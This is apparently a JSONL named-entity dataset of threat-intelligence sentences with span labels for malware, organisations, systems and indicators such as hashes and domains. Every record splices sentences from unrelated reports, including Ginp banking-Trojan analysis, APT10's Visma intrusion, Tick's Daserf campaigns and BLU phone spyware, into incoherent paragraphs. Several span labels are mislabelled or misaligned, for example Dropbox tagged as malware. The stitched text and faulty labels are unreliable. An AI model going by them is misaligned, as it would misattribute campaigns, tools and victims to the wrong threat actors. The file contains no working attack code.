{"start": 834, "end": 838, "label": "Malware"}, {"start": 844, "end": 854, "label": "Malware"}]}
{"text": "10/03/2020 At the end of February the actors behind Ginp added screen capture capabilities to their Trojan . During this operation (dubbed \u2018Cloud Hopper\u201d because of the group\u2019s use of popular western cloud-based services) , APT10 utilized both new malware (Quasar RAT , Trochilus , RedLeaves , ChChes as well as some familiar old tools . The threat often uses compromised web servers in Japan and the Republic of Korea .", "spans": [{"start": 52, "end": 56, "label": "Malware"}, {"start": 224, "end": 229, "label": "Organization"}, {"start": 256, "end": 267, "label": "System"}, {"start": 270, "end": 279, "label": "System"}, {"start": 282, "end": 291, "label": "System"}, {"start": 294, "end": 300, "label": "System"}]}
{"text": "Like previously added functionality , the code is borrowed from the leaked Anubis Trojan source code . Most recently , on December 20 , 2018 , the U.S. Department of Justice charged two hackers associated with the Chinese Ministry of State Security (MSS) with global computer intrusion campaigns targeting intellectual property . As Kaspersky and Cybereason recently posted , Minzen is a modular malware that has both 32-bit and 64-bit components in its resource section or configuration data in its body .", "spans": [{"start": 75, "end": 81, "label": "Malware"}, {"start": 147, "end": 162, "label": "Organization"}, {"start": 186, "end": 193, "label": "Organization"}, {"start": 333, "end": 342, "label": "Organization"}, {"start": 347, "end": 357, "label": "Organization"}, {"start": 376, "end": 382, "label": "Malware"}]}
{"text": "It enables the bot to stream screenshots and send them to the C2 so that actors can see what is happening on the screen of the infected device . This indictment attributed the intrusions to APT10 , a group that had been conducting the malicious activities for over a decade on behalf of the MSS , China\u2019s civilian human intelligence agency . One of the Minzen samples ( SHA256 : 9374040a9e2f47f7037edaac19f21ff1ef6a999ff98c306504f89a37196074a2 ) found in the Republic of Korea in December 2016 installs simple backdoor module as a final payload on a compromised computer .", "spans": [{"start": 190, "end": 195, "label": "Organization"}, {"start": 353, "end": 359, "label": "Malware"}, {"start": 379, "end": 443, "label": "Indicator"}]}
{"text": "Overlay attack Ginp uses the Accessibility Service to check which application runs is the foreground . The Visma group operates across the entire Nordic region along with Benelux , Central , and Eastern Europe . It opens a TCP port and receives commands from a remote attacker .", "spans": [{"start": 107, "end": 112, "label": "Organization"}, {"start": 223, "end": 226, "label": "Indicator"}]}
{"text": "If the package name of the foreground app is included in the target list , an overlay is shown . Recorded Future has actively tracked APT10 for several years , focusing specifically on the group\u2019s targeting of MSPs and global internet infrastructure providers since the Operation Cloud Hopper report in 2017 . According to the debug path in the body , the author of the tool called it \u201c NamelessHdoor , \u201d and its internal version is identified as \u201c V1.5. \u201d", "spans": [{"start": 97, "end": 112, "label": "Organization"}, {"start": 134, "end": 139, "label": "Organization"}, {"start": 387, "end": 400, "label": "Malware"}]}
{"text": "The WebView-based overlay is loading an HTML page provided by the C2 in response to the package name provided by the bot . We were particularly interested in identifying whether any customers of the targeted MSPs were subsequently compromised by APT10 , given their potential access through compromised MSP networks . The payload is based on \u201c Nameless Backdoor \u201d which has been publicly available for more than ten years .", "spans": [{"start": 246, "end": 251, "label": "Organization"}, {"start": 303, "end": 306, "label": "Organization"}, {"start": 344, "end": 361, "label": "Malware"}]}
{"text": "Something that makes Ginp special is that all of its overlay screens for banking apps are consist of multiple steps , first stealing the victim \u2019 s login credentials , then stealing the credit card details ( to \u201c validate \u201d the user identity ) , as shown in the screenshots hereafter : The following code snippet shows that after the second overlay is filled-in and validated , it disappears and the targeted application is added to the list of packages names to be ignored for future overlays attacks . Recorded Future\u2019s Insikt Group has actively tracked APT10 for several years , focusing specifically on the group\u2019s targeting of MSPs and global internet infrastructure providers since the Operation Cloud Hopper report in 2017 . The oldest code we could identify was hosted on a famous Chinese source code sharing site since 2005 .", "spans": [{"start": 21, "end": 25, "label": "Malware"}, {"start": 504, "end": 521, "label": "Organization"}, {"start": 632, "end": 636, "label": "Organization"}, {"start": 657, "end": 681, "label": "Organization"}]}
{"text": "Targets The initial version of Ginp had a generic credit card grabber overlay screen used for all targeted applications . In September 2018 , one of our clients (and a supplier as well) , Visma , reached out to us for assistance in investigating an incident uncovered on their network following a breach notification by Rapid7 . The author of the NamelessHdoor appears to have created additional versions of the Nameless Backdoor by removing unnecessary functions , and added open-source DLL injection code from ReflectiveDLLLoader .", "spans": [{"start": 31, "end": 35, "label": "Malware"}, {"start": 320, "end": 326, "label": "Organization"}, {"start": 343, "end": 360, "label": "Malware"}, {"start": 412, "end": 429, "label": "Malware"}, {"start": 488, "end": 491, "label": "System"}, {"start": 512, "end": 531, "label": "System"}]}
{"text": "Still included in the last versions , this screen is only used to overlay the official Google Play Store app . This was followed by an initial exploitation , network enumeration , and malicious tool deployment on various Visma endpoints within two weeks of initial access . There is minimal public information regarding the Nameless Backdoor , except for the interesting report from Cyphort in 2015 .", "spans": [{"start": 87, "end": 104, "label": "System"}, {"start": 221, "end": 236, "label": "System"}, {"start": 324, "end": 341, "label": "Malware"}, {"start": 383, "end": 390, "label": "Organization"}]}
{"text": "More apps could be added to the grabber target list in the future , such as the ones that were targeted in older versions : Facebook WhatsApp Skype Twitter Chrome Instagram Snapchat Viber The following screenshot shows the generic card grabber overlay screen : Ginp generic grabber The current active target list is available in the appendix , containing a total of 24 unique targets . On August 30 , 2018 , APT10 deployed their first modified version of Trochilus that had its C2 communications encrypted using Salsa20 and RC4 ciphers instead of the more common RC4-encrypted Trochilus variant seen in the wild . The researcher of the company analyzed multiple threats , including Invader , Nioupale (Daserf ) and Hdoor found in an attack against an Asian financial institution .", "spans": [{"start": 124, "end": 132, "label": "System"}, {"start": 133, "end": 141, "label": "System"}, {"start": 142, "end": 147, "label": "System"}, {"start": 148, "end": 155, "label": "System"}, {"start": 156, "end": 162, "label": "System"}, {"start": 163, "end": 172, "label": "System"}, {"start": 173, "end": 181, "label": "System"}, {"start": 182, "end": 187, "label": "System"}, {"start": 261, "end": 265, "label": "Malware"}, {"start": 408, "end": 413, "label": "Organization"}, {"start": 455, "end": 464, "label": "System"}, {"start": 682, "end": 689, "label": "Malware"}, {"start": 692, "end": 700, "label": "Malware"}, {"start": 715, "end": 720, "label": "Malware"}]}
{"text": "The following screenshots show what type of information is collected in both steps of the overlay attack : Ginp overlaysGinp overlaysGinp overlaysGinp overlays Based on Anubis Once the Anubis bot code got leaked , it was just a matter of time before new banking Trojans based on Anubis would surface . This sample , similar to other Trochilus samples , was deployed using a DLL sideloading method utilizing three files , uploaded to the same folder on the victim machine as identified in US-CERT advisory TA17-117A last revised on December 20 , 2018 . We examined the sample described in the report as Hdoor and found it \u2019s a previous version of the NamelessHdoor we discovered in the Minzen sample , but without support for DLL injection .", "spans": [{"start": 107, "end": 111, "label": "Malware"}, {"start": 169, "end": 175, "label": "Malware"}, {"start": 185, "end": 191, "label": "Malware"}, {"start": 279, "end": 285, "label": "Malware"}, {"start": 307, "end": 313, "label": "Malware"}, {"start": 333, "end": 342, "label": "Malware"}, {"start": 374, "end": 389, "label": "Malware"}, {"start": 421, "end": 429, "label": "Malware"}, {"start": 602, "end": 607, "label": "Malware"}, {"start": 650, "end": 663, "label": "Malware"}, {"start": 725, "end": 728, "label": "System"}]}
{"text": "When analyzing the Ginp \u2019 s recent samples , ThreatFabric analysts found some similarities with the famous Android banking Trojan . The configuration file then loads the Trochilus payload into memory by injecting it into a valid system process . It turned out that the DLL files we found are a custom variant of Gh0st RAT , and the EXE files download the RAT .", "spans": [{"start": 19, "end": 23, "label": "Malware"}, {"start": 45, "end": 57, "label": "System"}, {"start": 136, "end": 154, "label": "Malware"}, {"start": 203, "end": 212, "label": "Malware"}, {"start": 269, "end": 272, "label": "System"}, {"start": 312, "end": 321, "label": "Malware"}]}
{"text": "Based on the evolution of Ginp it is clear that it isn \u2019 t based on Anubis , but rather reuses some of its code . APT10 also used WinRAR and cURL for Windows , both often renamed , to compress and upload the exfiltrated files from the Visma network to the Dropbox API . Since the source code is publicly available , Gh0st RAT has been used by multiple actors for years .", "spans": [{"start": 26, "end": 30, "label": "Malware"}, {"start": 68, "end": 74, "label": "Malware"}, {"start": 114, "end": 119, "label": "Organization"}, {"start": 130, "end": 136, "label": "System"}, {"start": 141, "end": 145, "label": "System"}, {"start": 316, "end": 325, "label": "Malware"}]}
{"text": "Below are some of the elements showing the relation . In order to exfiltrate the compromised data , APT10 employed custom malware that used Dropbox as its C2 . The domain , softfix.co.kr was registered in 2014 .", "spans": [{"start": 100, "end": 105, "label": "Organization"}, {"start": 140, "end": 147, "label": "System"}, {"start": 173, "end": 186, "label": "Indicator"}]}
{"text": "The names used for Android components are similar : Similarities with AnubisSimilarities with Anubis When analyzing these components , similarities were found in the code of both malware families : Similarities with Anubis Another major change that indicated that the actor copied code from the Anubis Trojan is the way of handling configuration values . They also used WinRAR and cURL for Windows , both often renamed , to compress and upload the exfiltrated files from the Visma network to the Dropbox API . One of subdomains , news.softfix.co.kr was the C2 server of Daserf ( 9c7a34390e92d4551c26a3feb5b181757b3309995acd1f92e0f63f888aa89423 ) .", "spans": [{"start": 19, "end": 26, "label": "System"}, {"start": 94, "end": 100, "label": "Malware"}, {"start": 216, "end": 222, "label": "System"}, {"start": 295, "end": 301, "label": "Malware"}, {"start": 475, "end": 480, "label": "System"}, {"start": 496, "end": 507, "label": "System"}, {"start": 530, "end": 548, "label": "Indicator"}, {"start": 557, "end": 559, "label": "System"}, {"start": 570, "end": 576, "label": "Malware"}, {"start": 579, "end": 643, "label": "Indicator"}]}
{"text": "Previous versions were storing config values within the variables of a class , while the latest version is using SharedPreferences with some of the keys being identical to those used by Anubis : isAccessibility time_work time_start_permission url_inj Conclusion Ginp is a simple but rather efficient banking Trojan providing the basic functionality to be able to trick victims into delivering personal information . Our research partner Rapid7 investigated the Dropbox use and found that the attackers had used the same account to store exfiltrated data from a global apparel company . Another subdomain , bbs.softfix.co.kr was hosted on same IP address as bbs.gokickes.com , which was reported as the C2 server of Invader by Cyphort .", "spans": [{"start": 186, "end": 192, "label": "System"}, {"start": 262, "end": 266, "label": "Malware"}, {"start": 437, "end": 443, "label": "Organization"}, {"start": 461, "end": 468, "label": "System"}, {"start": 492, "end": 501, "label": "Organization"}, {"start": 606, "end": 623, "label": "Indicator"}, {"start": 657, "end": 673, "label": "Indicator"}, {"start": 702, "end": 704, "label": "System"}, {"start": 715, "end": 722, "label": "Malware"}, {"start": 726, "end": 733, "label": "Organization"}]}
{"text": "In a 5-month timespan , actor managed to create a Trojan from scratch which will presumably continue evolving offering new features such as keylogging , back-connect proxy or RAT capabilities . They also identified broadly similar TTPs being used in the attack against a U.S law firm specializing in intellectual property law . We also identified www.gokickes.com was the C2 of another Invader variant ( 57e1d3122e6dc88d9eb2989f081de88a0e6864e767281d509ff58834928895fb ) .", "spans": [{"start": 194, "end": 198, "label": "Organization"}, {"start": 347, "end": 363, "label": "Indicator"}, {"start": 372, "end": 374, "label": "System"}, {"start": 386, "end": 401, "label": "Malware"}, {"start": 404, "end": 468, "label": "Indicator"}]}
{"text": "Ginp \u2019 s unusual target selection is not just about its focus on Spanish banks but also the wide selection of targeted apps per bank . Rapid7\u2019s investigation revealed the law firm was first targeted in late 2017 , followed by the apparel company a few months later , and finally , the Visma attack in August 2018 . In addition to the infrastructure , the attacker also shared code .", "spans": [{"start": 0, "end": 4, "label": "Malware"}, {"start": 135, "end": 143, "label": "Organization"}, {"start": 171, "end": 179, "label": "Organization"}]}
{"text": "The fact that the overlay screens are almost identical to the legitimate banking apps suggests that the actors might be very familiar with the Spanish banking applications and might even be accustomed to the language . In one of the attacks , Rapid7 identified the attackers escaping a Citrix application in order to run the payload script on the victim desktop . The Gh0st downloaders employ simple substitution ciphers for hiding strings .", "spans": [{"start": 243, "end": 249, "label": "Organization"}, {"start": 265, "end": 274, "label": "Organization"}, {"start": 286, "end": 292, "label": "System"}, {"start": 368, "end": 373, "label": "Malware"}]}
{"text": "Although the current target list is limited to Spanish apps , it seems that the actor is taking into account that the bot should also be able to target other countries , seeing that the path used in the inject requests contains the country code of the targeted institution . Additionally , the same DLL sideloading technique observed in the Visma attack was used , and many of the tools deployed by the APT10 shared naming similarities as well 1.bat , cu.exe , ss.rar , r.exe , pd.exe . We also identified another malware family , HomamDownloader , sharing some servers with Daserf .", "spans": [{"start": 341, "end": 346, "label": "System"}, {"start": 403, "end": 408, "label": "Organization"}, {"start": 444, "end": 449, "label": "System"}, {"start": 452, "end": 458, "label": "System"}, {"start": 461, "end": 467, "label": "System"}, {"start": 470, "end": 475, "label": "System"}, {"start": 478, "end": 484, "label": "System"}, {"start": 531, "end": 546, "label": "Malware"}, {"start": 575, "end": 581, "label": "Malware"}]}
{"text": "This could indicate that actor already has plans in expanding the targets to applications from different countries and regions . Most interestingly , Rapid7 observed the use of the Notepad++ updater gup.exe as a legitimate executable to sideload a malicious DLL (libcurl.dll) in order to deploy a variant of the UPPERCUT backdoor also known as ANEL . An overview of the connections among these threats is discussed in below .", "spans": [{"start": 150, "end": 156, "label": "Organization"}, {"start": 199, "end": 206, "label": "Malware"}, {"start": 344, "end": 348, "label": "Malware"}]}
{"text": "Appendix Samples Some of the latest Ginp samples found in the wild : App name Package name SHA-256 hash Google Play Verificator sing.guide.false 0ee075219a2dfde018f17561467272633821d19420c08cba14322cc3b93bb5d5 Google Play Verificator park.rather.dance 087a3beea46f3d45649b7506073ef51c784036629ca78601a4593759b253d1b7 Adobe Flash Player ethics.unknown.during APT10 used this approach to deploy UPPERCUT when targeting Japanese corporations in July 2018 . HomamDownloader is a small downloader program with minimal interesting characteristics from a technical point of view .", "spans": [{"start": 36, "end": 40, "label": "Malware"}, {"start": 104, "end": 127, "label": "System"}, {"start": 128, "end": 144, "label": "Indicator"}, {"start": 145, "end": 209, "label": "Indicator"}, {"start": 210, "end": 233, "label": "System"}, {"start": 234, "end": 251, "label": "System"}, {"start": 252, "end": 316, "label": "Indicator"}, {"start": 317, "end": 335, "label": "System"}, {"start": 336, "end": 357, "label": "Indicator"}, {"start": 358, "end": 363, "label": "Organization"}, {"start": 393, "end": 401, "label": "System"}, {"start": 417, "end": 438, "label": "Organization"}, {"start": 454, "end": 469, "label": "Malware"}]}
{"text": "5ac6901b232c629bc246227b783867a0122f62f9e087ceb86d83d991e92dba2f Adobe Flash Player solution.rail.forward 7eb239cc86e80e6e1866e2b3a132b5af94a13d0d24f92068a6d2e66cfe5c2cea Adobe Flash Player com.pubhny.hekzhgjty 14a1b1dce69b742f7e258805594f07e0c5148b6963c12a8429d6e15ace3a503c APT10 actors gained initial access to the Visma network around August 17 , 2018 . HomamDownloader was discovered to be delivered by Tick via a spearphishing email .", "spans": [{"start": 0, "end": 64, "label": "Indicator"}, {"start": 65, "end": 83, "label": "System"}, {"start": 84, "end": 105, "label": "Indicator"}, {"start": 106, "end": 170, "label": "Indicator"}, {"start": 171, "end": 189, "label": "System"}, {"start": 190, "end": 210, "label": "Indicator"}, {"start": 211, "end": 275, "label": "Indicator"}, {"start": 276, "end": 281, "label": "Organization"}, {"start": 318, "end": 331, "label": "System"}, {"start": 358, "end": 373, "label": "Malware"}, {"start": 408, "end": 412, "label": "Organization"}, {"start": 433, "end": 438, "label": "System"}]}
{"text": "Adobe Flash Player sentence.fancy.humble 78557094dbabecdc17fb0edb4e3a94bae184e97b1b92801e4f8eb0f0626d6212 Target list The current list of apps observed to be targeted by Ginp contains a total of 24 unique applications as seen below . While we are confident that APT10 actors gained access to the Visma network in August using stolen employee Citrix remote desktop credentials , it is not clear how or when these credentials were initially compromised . The adversary crafted credible email and attachment after understanding the targets and their behavior .", "spans": [{"start": 0, "end": 18, "label": "System"}, {"start": 19, "end": 40, "label": "Indicator"}, {"start": 41, "end": 105, "label": "Indicator"}, {"start": 170, "end": 174, "label": "Malware"}, {"start": 262, "end": 267, "label": "Organization"}, {"start": 296, "end": 301, "label": "Organization"}, {"start": 342, "end": 363, "label": "System"}, {"start": 484, "end": 489, "label": "System"}]}
{"text": "This list is expected to grow in the future . Insikt Group analysis of network metadata to and from the VPN endpoint IPs revealed consistent connectivity to Citrix-hosted infrastructure from all eight VPN endpoint IPs starting on August 17 , 2018 \u2014 the same date the first authenticated login to Visma\u2019s network was made using stolen credentials . The email below was sent from a personal email account with a subject line of \u201c New Year Wishes on January 1st \u201d .", "spans": [{"start": 46, "end": 58, "label": "Organization"}, {"start": 157, "end": 170, "label": "Malware"}, {"start": 201, "end": 213, "label": "Malware"}, {"start": 352, "end": 357, "label": "System"}, {"start": 389, "end": 394, "label": "System"}]}
{"text": "Why Did Chinese Spyware Linger in U.S . After almost two weeks , on August 30 , 2018 , APT10 attackers used their access to the network to move laterally and made their first deployment of an RC4- and Salsa20-encrypted variant of the Trochilus malware using a previously associated DLL sideloading techniquE . The message asked the recipient to rename the attachment extension from \u201c ._X_ \u201d to \u201c .exe \u201d and opening it with the password specified in the email to view the Happy New Year eCard in the correct and polite language .", "spans": [{"start": 87, "end": 92, "label": "Organization"}, {"start": 234, "end": 243, "label": "System"}, {"start": 384, "end": 388, "label": "Indicator"}, {"start": 396, "end": 400, "label": "Indicator"}, {"start": 453, "end": 458, "label": "System"}]}
{"text": "Phones ? This means that APT10 actors had two separate access points into the Visma network . In addition to the social engineering email technique , the attacker also employs a trick to the attachment .", "spans": [{"start": 25, "end": 30, "label": "Organization"}, {"start": 78, "end": 91, "label": "System"}, {"start": 132, "end": 137, "label": "System"}]}
{"text": "November 16 , 2016 In what 's being chalked up as an apparent mistake , more than 120,000 Android phones sold in the U.S. were shipped with spying code that sent text messages , call logs and other sensitive data to a server in Shanghai . This slight delay may point to the handing over of active exploitation duties to other operator(s) in a multi-team APT10 effort within the Ministry of State Security for the attack . The actor embedded malicious code to a resource section of the legitimate SFX file created by a file encryption tool , and modified the entry point of the program for jumping to the malicious code soon after the SFX program starts .", "spans": [{"start": 90, "end": 97, "label": "System"}, {"start": 354, "end": 359, "label": "Organization"}]}
{"text": "The New York Times reported on Nov. 15 that Kryptowire , a mobile enterprise security company , discovered the code on a lower-end smartphone made by BLU Products of Doral , Fla . Other examples of malicious infrastructure registered with internet.bs include domains for APT28\u2019s VPNFilter malware campaign and the registration of the cyber-berkut . The malicious code drops HomamDownloader , then jumps back to the regular flow in the CODE section , which in turn asks the user the password and decrypts the file .", "spans": [{"start": 4, "end": 18, "label": "Organization"}, {"start": 44, "end": 54, "label": "Organization"}, {"start": 150, "end": 153, "label": "Organization"}, {"start": 271, "end": 278, "label": "Organization"}, {"start": 279, "end": 288, "label": "System"}, {"start": 334, "end": 346, "label": "System"}, {"start": 374, "end": 389, "label": "Malware"}]}
{"text": "The phones are sold at Best Buy and Amazon.com , among other retail outlets . org domain that was affiliated with the pro-Russian and potentially Russian state-linked threat actor CyberBerkut . Therefore , once a user executes the attachment and sees the password dialog on SFX , the downloader dropped by the malicious code starts working even if the user chooses the Cancel on the password window .", "spans": [{"start": 23, "end": 31, "label": "Organization"}, {"start": 36, "end": 46, "label": "Organization"}, {"start": 180, "end": 191, "label": "Organization"}]}
{"text": "Kryptowire says the code , which it found on a BLU R1 HD devices , transmitted fine-grained location information and allowed for the remote installation of other apps . KHRAT is a backdoor trojan purported to be used with the China-linked cyberespionage group DragonOK . Should the user become aware of the infection later , it may be difficult to find the cause due to the fact that the original embedded file contained within the SFX is benign .", "spans": [{"start": 0, "end": 10, "label": "Organization"}, {"start": 47, "end": 50, "label": "Organization"}, {"start": 169, "end": 174, "label": "Malware"}, {"start": 180, "end": 195, "label": "System"}, {"start": 260, "end": 268, "label": "Organization"}]}
{"text": "Text message and call logs were transmitted every 72 hours to the Shanghai server , and once a day for other personally identifiable data , the company says . In early 2018 , Rapid7 identified that APT10 compromised an apparel company , based upon detections and intelligence gathered from the U.S.-based law firm breach . Tick was spotted last year , but they are actively and silently attacking various organizations in South Korea and Japan for a number of years .", "spans": [{"start": 175, "end": 181, "label": "Organization"}, {"start": 198, "end": 203, "label": "Organization"}, {"start": 219, "end": 234, "label": "Organization"}, {"start": 305, "end": 313, "label": "Organization"}, {"start": 323, "end": 327, "label": "Organization"}]}
{"text": "It turns out , however , that other security researchers noticed suspicious and faulty code on BLU devices as early as March 2015 , and it has taken nearly that long to remove it from the company 's devices . The attacker gained access to the victim\u2019s internet-accessible Citrix systems and authenticated to them from networks associated with low-cost VPN providers owned by VPN Consumer Network . While some of the group \u2019s tools , tactics , and procedures ( TTPs ) have been covered within this article , it is likely there is much that still remains uncovered .", "spans": [{"start": 95, "end": 98, "label": "Organization"}, {"start": 213, "end": 221, "label": "Organization"}, {"start": 272, "end": 278, "label": "System"}]}
{"text": "The finding , in part , shows the risk that can come in opting for less expensive smartphones , whose manufacturers may not diligently fix security vulnerabilities . Rapid7 again observed APT10 dropping payloads named ccSEUPDT.exe The attackers used identical TTPs for executing malware and Mimikatz as observed before , by using DLL sideloading with known good binaries that had DLL search order path issues . Daserf : 04080fbab754dbf0c7529f8bbe661afef9c2cba74e3797428538ed5c243d705a .", "spans": [{"start": 139, "end": 163, "label": "Vulnerability"}, {"start": 166, "end": 172, "label": "Organization"}, {"start": 188, "end": 193, "label": "Organization"}, {"start": 218, "end": 230, "label": "Malware"}, {"start": 291, "end": 299, "label": "System"}, {"start": 411, "end": 417, "label": "Malware"}, {"start": 420, "end": 484, "label": "Indicator"}]}
{"text": "It 's also raising eyebrows because of the connection with China , which has frequently sparred with the U.S. over cyber espionage . Rapid7 reviewed malware discovered in the victim\u2019s environment and found implants that used Dropbox as the C2 . Daserf : f8458a0711653071bf59a3153293771a6fb5d1de9af7ea814de58f473cba9d06 .", "spans": [{"start": 133, "end": 139, "label": "Organization"}, {"start": 225, "end": 232, "label": "Malware"}, {"start": 245, "end": 251, "label": "Malware"}, {"start": 254, "end": 318, "label": "Indicator"}]}
{"text": "BLU Products has now updated its phones to remove the spying code , which most likely would have never been detected by regular users . The attackers used the same method of lateral movement by mounting the remote drive on a system , copying 1.bat to it , using task scheduler to execute the batch script , and finally , deleting the batch script . Daserf : e8edde4519763bb6669ba99e33b4803a7655805b8c3475b49af0a49913577e51 .", "spans": [{"start": 0, "end": 3, "label": "Organization"}, {"start": 140, "end": 149, "label": "Organization"}, {"start": 242, "end": 247, "label": "System"}, {"start": 349, "end": 355, "label": "Malware"}, {"start": 358, "end": 422, "label": "Indicator"}]}
{"text": "The code never informed phone users that it was collecting that data , a behavior uniformly viewed by many as a serious security concern . APT10 used the same method of lateral movement by mounting the remote drive on a system , copying 1.bat to it , using task scheduler to execute the batch script , and finally , deleting the batch script . Daserf : 21111136d523970e27833dd2db15d7c50803d8f6f4f377d4d9602ba9fbd355cd .", "spans": [{"start": 139, "end": 144, "label": "Organization"}, {"start": 344, "end": 350, "label": "Malware"}, {"start": 353, "end": 417, "label": "Indicator"}]}
{"text": "The developer of the code , Shanghai Adups Technology Co. , has apologized , contending that the code was intended for another one of its clients who requested better blocking of junk text messages and marketing calls . For exfiltration of stolen data , APT10 used WinRAR and renamed rar.exe to r.exe to create archives , upload them with curl.exe (renamed to c.exe , and again , use the cloud storage provider Dropbox . Daserf : 9c7a34390e92d4551c26a3feb5b181757b3309995acd1f92e0f63f888aa89423 .", "spans": [{"start": 28, "end": 57, "label": "Organization"}, {"start": 254, "end": 259, "label": "Organization"}, {"start": 265, "end": 271, "label": "System"}, {"start": 284, "end": 291, "label": "Malware"}, {"start": 295, "end": 300, "label": "Malware"}, {"start": 339, "end": 347, "label": "Malware"}, {"start": 360, "end": 365, "label": "Malware"}, {"start": 411, "end": 418, "label": "System"}, {"start": 421, "end": 427, "label": "Malware"}, {"start": 430, "end": 494, "label": "Indicator"}]}
{"text": "Vulnerabilities Reported BLU Products , founded in 2009 , makes lower-end Android-powered smartphones that sell for as little as $ 50 on Amazon . Rapid7 discovered that additional data was placed into the Dropbox accounts under control of the attacker during the compromise and was able to attribute data that was placed into it as being owned by Visma . Invader : 0df20ccd074b722d5fe1358b329c7bdebcd7e3902a1ca4ca8d5a98cc5ce4c287 .", "spans": [{"start": 74, "end": 89, "label": "System"}, {"start": 137, "end": 143, "label": "Organization"}, {"start": 146, "end": 152, "label": "Organization"}, {"start": 243, "end": 251, "label": "Organization"}, {"start": 355, "end": 362, "label": "Malware"}, {"start": 365, "end": 429, "label": "Indicator"}]}
{"text": "Like many original equipment manufacturers , it uses software components from other developers . Once on the Visma network , APT10 attackers used the Microsoft BITSAdmin CLI tool to copy malicious tools from a suspected attacker-controlled C2 hosted on 173.254.236[.]158 to the \\ProgramData\\temp\\ directory on the infected host . Invader : e9574627349aeb7dd7f5b9f9c5ede7faa06511d7fdf98804526ca1b2e7ce127e .", "spans": [{"start": 109, "end": 122, "label": "System"}, {"start": 125, "end": 130, "label": "Organization"}, {"start": 160, "end": 169, "label": "System"}, {"start": 330, "end": 337, "label": "Malware"}, {"start": 340, "end": 404, "label": "Indicator"}]}
{"text": "The company uses a type of software from Adups that 's nicknamed FOTA , short for firmware over-the-air . Rapid7 then provided a breach notification to Visma to alert them to this compromise in September 2018 . Invader : 57e1d3122e6dc88d9eb2989f081de88a0e6864e767281d509ff58834928895fb . 9002 S-MAL:933d66b43b3ce9a572ee3127b255b4baf69d6fdd7cb24da609b52ee277baa76e . 9002 S-MAL:2bec20540d200758a223a7e8f7b2f98cd4949e106c1907d3f194216208c5b2fe . 9002 S-MAL:055fe8002de293401852310ae76cb730c570f2037c3c832a52a79b70e2cb7831 .", "spans": [{"start": 41, "end": 46, "label": "Organization"}, {"start": 65, "end": 69, "label": "System"}, {"start": 106, "end": 112, "label": "Organization"}, {"start": 211, "end": 218, "label": "Malware"}, {"start": 221, "end": 285, "label": "Indicator"}, {"start": 288, "end": 363, "label": "Indicator"}, {"start": 366, "end": 441, "label": "Indicator"}, {"start": 444, "end": 519, "label": "Indicator"}]}
{"text": "The software manages the delivery of firmware updates over-the-air , the term used for transmission via a mobile network . We believe APT10 is the most significant known Chinese state-sponsored cyber threat to global corporations . Minzen : 797d9c00022eaa2f86ddc9374f60d7ad92128ca07204b3e2fe791c08da9ce2b1 .", "spans": [{"start": 134, "end": 139, "label": "Organization"}, {"start": 232, "end": 238, "label": "Malware"}, {"start": 241, "end": 305, "label": "Indicator"}]}
{"text": "Firmware is low-level code deep in an operating system that often has high access privileges , so it 's critical that it 's verified and contains no software vulnerabilities . APT10's unprecedented campaign against MSPs , alleged to have included some of the largest MSPs in the world , in order to conduct secondary attacks against their clients , grants the Chinese state the ability to potentially access the networks of hundreds (if not thousands) of corporations around the world . Minzen : 9374040a9e2f47f7037edaac19f21ff1ef6a999ff98c306504f89a37196074a2 .", "spans": [{"start": 176, "end": 183, "label": "Organization"}, {"start": 215, "end": 219, "label": "Organization"}, {"start": 487, "end": 493, "label": "Malware"}, {"start": 496, "end": 560, "label": "Indicator"}]}
{"text": "Long before Kryptowire 's announcement , Tim Strazzere , a mobile security researcher with RedNaga Security , contacted BLU Products in March 2015 after he found two vulnerabilities that could be traced to Adup 's code . This campaign brings to light further evidence supporting the assertions made by the Five Eyes nations , led by the U.S Department of Justice indictment against APT10 actors outlining the unprecedented scale of economic cyberespionage being conducted by the Chinese Ministry of State Security . Minzen : 26727d139b593486237b975e7bdf93a8148c52d5fb48d5fe540a634a16a6ba82 .", "spans": [{"start": 12, "end": 22, "label": "Organization"}, {"start": 91, "end": 107, "label": "Organization"}, {"start": 206, "end": 210, "label": "Organization"}, {"start": 382, "end": 387, "label": "Organization"}, {"start": 432, "end": 440, "label": "Organization"}, {"start": 516, "end": 522, "label": "Malware"}, {"start": 525, "end": 589, "label": "Indicator"}]}
{"text": "Those vulnerabilities could have enabled someone to gain broad access to an Android device . This report , alongside the plethora of other reporting on APT10 operations , acutely highlights the vulnerability of organizational supply chains . NamelessHdoor : dfc8a6da93481e9dab767c8b42e2ffbcd08fb813123c91b723a6e6d70196636f .", "spans": [{"start": 76, "end": 83, "label": "System"}, {"start": 152, "end": 157, "label": "Organization"}, {"start": 242, "end": 255, "label": "Malware"}, {"start": 258, "end": 322, "label": "Indicator"}]}
{"text": "Strazzere 's colleague , Jon Sawyer , suggested on Twitter that the vulnerabilities might have not been there by mistake , but rather included as intentionally coded backdoors . We believe the groups moved to use CVE-2018-0798 instead of the other Microsoft Equation Editor Remote Code Execution (RCE) vulnerabilities because the former is more reliable as it works on all known versions of Equation Editor . Gh0stRAt Downloader : ce47e7827da145823a6f2b755975d1d2f5eda045b4c542c9b9d05544f3a9b974 .", "spans": [{"start": 51, "end": 58, "label": "Organization"}, {"start": 193, "end": 199, "label": "Organization"}, {"start": 213, "end": 226, "label": "Vulnerability"}, {"start": 409, "end": 428, "label": "Malware"}, {"start": 431, "end": 495, "label": "Indicator"}]}
{"text": "He posted a tweet to The New York Times report , sarcastically writing , \" If only two people had called this company out for their backdoors several times over the last few years . The analyzed RTF files share the same object dimension (objw2180\\objh300) used to track the RTF weaponizer in our previous report , however , the sample was not exploiting CVE-2017-11882 or CVE-2018-0802 . Gh0stRAt Downloader : e34f4a9c598ad3bb243cb39969fb9509427ff9c08e63e8811ad26b72af046f0c .", "spans": [{"start": 25, "end": 39, "label": "Organization"}, {"start": 328, "end": 334, "label": "Malware"}, {"start": 354, "end": 368, "label": "Vulnerability"}, {"start": 372, "end": 385, "label": "Vulnerability"}, {"start": 388, "end": 407, "label": "Malware"}, {"start": 410, "end": 474, "label": "Indicator"}]}
{"text": "'' Strazzere 's experience in trying to contact both vendors last year is typical of the frustrations frequently faced by security researchers . After further analysis , it was discovered that the RTF files were exploiting the CVE-2018-0798 vulnerability in Microsoft\u2019s Equation Editor (EQNEDT32) . Custom Gh0st : 8e5a0a5f733f62712b840e7f5051a2bd68508ea207e582a190c8947a06e26f40 .", "spans": [{"start": 197, "end": 206, "label": "Malware"}, {"start": 227, "end": 240, "label": "Vulnerability"}, {"start": 299, "end": 311, "label": "Malware"}, {"start": 314, "end": 378, "label": "Indicator"}]}
